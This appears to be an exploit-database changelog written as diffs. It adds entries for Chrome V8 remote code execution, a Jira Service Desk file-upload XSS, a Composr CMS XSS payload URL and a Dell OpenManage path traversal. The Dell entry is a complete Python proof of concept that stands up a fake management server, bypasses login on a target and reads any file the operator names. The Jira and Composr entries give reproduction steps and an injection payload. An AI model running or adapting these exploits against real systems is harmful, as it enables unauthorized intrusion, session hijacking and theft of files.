DB: 2021-04-08

5 changes to exploits/shellcodes

Google Chrome 86.0.4240 V8 - Remote Code Execution
Google Chrome 81.0.4044 V8 - Remote Code Execution
Google Chrome 86.0.4240 V8 - Remote Code Execution
Google Chrome 81.0.4044 V8 - Remote Code Execution
Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS
Composr CMS 10.0.36 - Cross Site Scripting
Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read

exploits/multiple/remote/49745.js

@@ -1,15 +1,38 @@
 # Exploit Title: Google Chrome 86.0.4240 V8 - Remote Code Execution
-# Date: 05/04/2021
-# Exploit Author: Tobias Marcotto
-# Original Author: r4j0x00
-# Tested on: Kali Linux x64 
-# Version: 87.0.4280.88
+# Exploit Author: r4j0x00
+# Version: < 87.0.4280.88
 # Description: Insufficient data validation in V8 in Google Chrome prior to 87.0.4280.88 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
 # CVE: CVE-2020-16040
-# Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
 
-*********************************************************************************************************
+/*
+BSD 2-Clause License
 
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
+
+// Reference: https://faraz.faith/2021-01-07-cve-2020-16040-analysis/
 
 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
 var wasm_mod = new WebAssembly.Module(wasm_code);

exploits/multiple/remote/49746.js

@@ -1,15 +1,36 @@
 # Exploit Title: Google Chrome 81.0.4044 V8 - Remote Code Execution
-# Date: 05/04/2021
-# Exploit Author: Tobias Marcotto
-# Original Author: r4j0x00
-# Tested on: Kali Linux x64 
-# Version: 83.0.4103.106
+# Exploit Author: r4j0x00
+# Version: < 83.0.4103.106
 # Description: Out of bounds write in V8 in Google Chrome prior to 83.0.4103.106 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.
 # CVE: CVE-2020-6507
 
+/*
+BSD 2-Clause License
 
-*********************************************************************************************************
+Copyright (c) 2021, rajvardhan agarwal
+All rights reserved.
 
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+1. Redistributions of source code must retain the above copyright notice, this
+   list of conditions and the following disclaimer.
+
+2. Redistributions in binary form must reproduce the above copyright notice,
+   this list of conditions and the following disclaimer in the documentation
+   and/or other materials provided with the distribution.
+
+THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
+AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
+FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
+CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
+OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
+OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+*/
 
 var buf = new ArrayBuffer(8);
 var f64_buf = new Float64Array(buf);

exploits/multiple/webapps/49748.txt

@@ -0,0 +1,24 @@
+# Exploit Title: Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS
+# Date: 07 Mar 2020
+# Exploit Author: Captain_hook
+# Vendor Homepage: https://www.atlassian.com/
+# Version: < 4.10.0
+# Tested on: All OS
+# CVE: CVE-2020-14166
+
+Summary:
+
+The /servicedesk/customer/portals resource in Jira Service Desk Server and Data Center before version 4.10.0 allows remote attackers with project administrator privileges to inject arbitrary HTML or JavaScript names via an Cross Site Scripting (XSS) vulnerability by uploading a html file.
+
+Steps to reproduce:
+
+1- reach to this directory http://localhost:port/servicedesk/customer/portals?customize=true
+2- There's a place where the banner can be uploaded when upload wizard popup you can see that the banner image restricted to image format, you can change that type easily
+3- then you can upload HTML and javascript files and hijacking cookies or XSRF tokens.
+
+Original report in bugcrowd:
+
+https://bugcrowd.com/disclosures/61a50171-aa55-4126-b9f4-4e82b4b8c301/unrestricted-file-upload-stored-xss-for-token-hijacking
+Original ticket in atlassian:
+
+https://jira.atlassian.com/browse/JSDSERVER-6895?error=login_required&error_description=Login+required&state=28f8e754-fb05-4f5e-adda-79e252fe2c30

exploits/php/webapps/49749.txt

@@ -0,0 +1,11 @@
+# Exploit Title: Composr CMS 10.0.36 - Cross Site Scripting
+# Date: 04/06/2021
+# Exploit Author: Orion Hridoy
+# Vendor Homepage: https://compo.sr/
+# Software Link: https://compo.sr/download.htm
+# Version: 10.0.36
+# Tested on: Windows/Linux
+# CVE : CVE-2021-30150
+
+Vulnerable Endpoint:
+https://site.com/data/ajax_tree.php?hook=choose_gallery&id=&options=a:5:{s:21:"must_accept_something";b:1;s:6:"purity";b:0;s:14:"addable_filter";b:1;s:6:"filter";N;s:9:"member_id";N;}&default=<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert("Hello")</something:script>

exploits/windows/webapps/49750.py

@@ -0,0 +1,117 @@
+# Exploit Title: Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read
+# Date: 4/27/2020
+# Exploit Author: Rhino Security Labs
+# Version: <= 9.4
+# Description: Dell EMC OpenManage Server Administrator (OMSA) versions 9.4 and prior contain multiple path traversal vulnerabilities. An unauthenticated remote attacker could potentially exploit these vulnerabilities by sending a crafted Web API request containing directory traversal character sequences to gain file system access on the compromised management station.
+# CVE: CVE-2020-5377
+
+# This is a proof of concept for CVE-2020-5377, an arbitrary file read in Dell OpenManage Administrator
+# Proof of concept written by: David Yesland @daveysec with Rhino Security Labs
+# More information can be found here: 
+# A patch for this issue can be found here: 
+# https://www.dell.com/support/article/en-us/sln322304/dsa-2020-172-dell-emc-openmanage-server-administrator-omsa-path-traversal-vulnerability
+
+from xml.sax.saxutils import escape
+import BaseHTTPServer
+import requests
+import thread
+import ssl
+import sys
+import re
+import os
+
+import urllib3
+urllib3.disable_warnings()
+
+if len(sys.argv) < 3:
+	print 'Usage python auth_bypass.py <yourIP> <targetIP>:<targetPort>'
+	exit()
+
+#This XML to imitate a Dell OMSA remote system comes from https://www.exploit-db.com/exploits/39909
+#Also check out https://github.com/hantwister/FakeDellOM
+class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
+	def do_POST(s):
+		data = ''
+		content_len = int(s.headers.getheader('content-length', 0))
+		post_body = s.rfile.read(content_len)
+		s.send_response(200)
+		s.send_header("Content-type", "application/soap+xml;charset=UTF-8")
+		s.end_headers()
+		if "__00omacmd=getuserrightsonly" in post_body:
+			data = escape("<SMStatus>0</SMStatus><UserRightsMask>458759</UserRightsMask>")
+		if "__00omacmd=getaboutinfo " in post_body:
+			data = escape("<ProductVersion>6.0.3</ProductVersion>")
+		if data:
+			requid = re.findall('>uuid:(.*?)<',post_body)[0]
+			s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?>
+							<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" xmlns:wsman="http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd" xmlns:n1="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/DCIM_OEM_DataAccessModule">
+							  <s:Header>
+							    <wsa:To>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</wsa:To>
+							    <wsa:RelatesTo>uuid:'''+requid+'''</wsa:RelatesTo>
+							    <wsa:MessageID>0d70cce2-05b9-45bb-b219-4fb81efba639</wsa:MessageID>
+							  </s:Header>
+							  <s:Body>
+							    <n1:SendCmd_OUTPUT>
+							      <n1:ResultCode>0</n1:ResultCode>
+							      <n1:ReturnValue>'''+data+'''</n1:ReturnValue>
+							    </n1:SendCmd_OUTPUT>
+							  </s:Body>
+							</s:Envelope>''')
+
+		else:
+			s.wfile.write('''<?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:wsmid="http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd"><s:Header/><s:Body><wsmid:IdentifyResponse><wsmid:ProtocolVersion>http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd</wsmid:ProtocolVersion><wsmid:ProductVendor>Fake Dell Open Manage Server Node</wsmid:ProductVendor><wsmid:ProductVersion>1.0</wsmid:ProductVersion></wsmid:IdentifyResponse></s:Body></s:Envelope>''')
+
+	def log_message(self, format, *args):
+		return
+
+createdCert = False
+if not os.path.isfile('./server.pem'):
+	print '[-] No server.pem certifcate file found. Generating one...'
+	os.system('openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes -subj "/C=NO/ST=NONE/L=NONE/O=NONE/OU=NONE/CN=NONE.com"')
+	createdCert = True
+
+def startServer():
+	server_class = BaseHTTPServer.HTTPServer
+	httpd = httpd = server_class(('0.0.0.0', 443), MyHandler)
+	httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
+	httpd.serve_forever()
+
+thread.start_new_thread(startServer,())
+
+myIP = sys.argv[1]
+target = sys.argv[2]
+
+def bypassAuth():
+	values = {}
+	url = "https://{}/LoginServlet?flag=true&managedws=false".format(target)
+	data = {"manuallogin": "true", "targetmachine": myIP, "user": "VULNERABILITY:CVE-2020-5377", "password": "plz", "application": "omsa", "ignorecertificate": "1"}
+	r = requests.post(url, data=data, verify=False, allow_redirects=False)
+	cookieheader = r.headers['Set-Cookie']
+	sessionid = re.findall('JSESSIONID=(.*?);',cookieheader)
+	pathid = re.findall('Path=/(.*?);',cookieheader)
+	values['sessionid'] = sessionid[0]
+	values['pathid'] = pathid[0]
+	return values
+
+ids = bypassAuth()
+sessionid = ids['sessionid']
+pathid = ids['pathid']
+
+print "Session: "+sessionid
+print "VID: "+pathid
+
+def readFile(target,sessid,pathid):
+    while True:
+        file = raw_input('file > ')
+        url = "https://{}/{}/DownloadServlet?help=Certificate&app=oma&vid={}&file={}".format(target,pathid,pathid,file)
+        cookies = {"JSESSIONID": sessid}
+        r = requests.get(url, cookies=cookies, verify=False)
+        print 'Reading contents of {}:\n{}'.format(file,r.content)
+
+def getPath(path):
+	if path.lower().startswith('c:\\'):
+		path = path[2:]
+        path = path.replace('\\','/')
+        return path
+
+readFile(target,sessionid,pathid)

files_exploits.csv

@@ -18436,8 +18436,8 @@ id,file,description,date,author,type,platform,port
 49682,exploits/hardware/remote/49682.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access",2021-03-19,LiquidWorm,remote,hardware,
 49695,exploits/hardware/remote/49695.txt,"KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Weak Default WiFi Password Algorithm",2021-03-22,LiquidWorm,remote,hardware,
 49719,exploits/multiple/remote/49719.py,"vsftpd 3.0.3 - Remote Denial of Service",2021-03-29,xynmaps,remote,multiple,
-49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
-49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,"Tobias Marcotto",remote,multiple,
+49745,exploits/multiple/remote/49745.js,"Google Chrome 86.0.4240 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
+49746,exploits/multiple/remote/49746.js,"Google Chrome 81.0.4044 V8 - Remote Code Execution",2021-04-06,r4j0x00,remote,multiple,
 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -43925,3 +43925,6 @@ id,file,description,date,author,type,platform,port
 49743,exploits/windows/webapps/49743.py,"Mini Mouse 9.2.0 - Remote Code Execution",2021-04-05,gosh,webapps,windows,
 49744,exploits/windows/webapps/49744.txt,"Mini Mouse 9.2.0 - Path Traversal",2021-04-05,gosh,webapps,windows,
 49747,exploits/ios/webapps/49747.txt,"Mini Mouse 9.3.0 - Local File inclusion / Path Traversal",2021-04-06,gosh,webapps,ios,
+49748,exploits/multiple/webapps/49748.txt,"Atlassian Jira Service Desk 4.9.1 - Unrestricted File Upload to XSS",2021-04-07,Captain_hook,webapps,multiple,
+49749,exploits/php/webapps/49749.txt,"Composr CMS 10.0.36 - Cross Site Scripting",2021-04-07,"Orion Hridoy",webapps,php,
+49750,exploits/windows/webapps/49750.py,"Dell OpenManage Server Administrator 9.4.0.0 - Arbitrary File Read",2021-04-07,"Rhino Security Labs",webapps,windows,